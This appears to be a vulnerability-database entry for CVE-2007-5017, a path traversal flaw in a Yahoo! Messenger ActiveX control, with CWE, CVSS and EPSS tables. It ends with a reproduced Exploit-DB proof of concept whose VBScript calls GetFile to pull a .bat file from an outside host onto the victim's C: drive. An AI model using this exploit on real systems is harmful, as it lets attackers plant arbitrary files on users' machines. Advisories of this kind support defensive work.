CVE-2007-5017

CVE Descriptions

Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-22	Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	5		AV:N/AC:L/Au:N/C:N/I:P/A:N	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	6.79%	–	–
2022-04-03	–	–	6.79%	–	–
2022-05-22	–	–	6.79%	–	–
2023-03-12	–	–	–	6%	–
2023-04-02	–	–	–	4.56%	–
2023-08-27	–	–	–	3.96%	–
2023-10-01	–	–	–	4%	–
2024-01-21	–	–	–	3.79%	–
2024-02-11	–	–	–	3.79%	–
2024-06-02	–	–	–	3.71%	–
2024-06-02	–	–	–	3.71%	–
2024-06-16	–	–	–	2.74%	–
2024-07-28	–	–	–	3.64%	–
2024-09-01	–	–	–	11.74%	–
2024-11-24	–	–	–	11.74%	–
2024-12-22	–	–	–	4.26%	–
2025-01-19	–	–	–	4.26%	–
2025-03-18	–	–	–	–	5.37%
2025-03-18	–	–	–	–	5.37,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	8%
2022-04-03	91%
2022-05-22	92%
2023-03-12	92%
2023-04-02	91%
2023-08-27	91%
2023-10-01	91%
2024-01-21	91%
2024-02-11	92%
2024-06-02	92%
2024-06-02	92%
2024-06-16	91%
2024-07-28	92%
2024-09-01	95%
2024-11-24	96%
2024-12-22	92%
2025-01-19	92%
2025-03-18	89%
2025-03-18	89%

Exploit information

Exploit Database EDB-ID : 4428

Publication date : 2007-09-18 22h00 +00:00
Author : shinnai
EDB Verified : Yes

<pre> <code><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download url: http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 Marked as: RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False From remote: depends by Internet Explorer settings From local: yes Description: This contron contains a "GetFile()" method which allows to download, on user's pc, an arbitrary file pased as argument. Remote execution depends by Internet Explorer settings, local execution works very well. greetz to: skyhole (or YAG KOHHA) for inspiration ----------------------------------------------------------------------------- <object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai" MsgBox "Exploit completed" End Sub </script> </code></pre> # milw0rm.com [2007-09-19]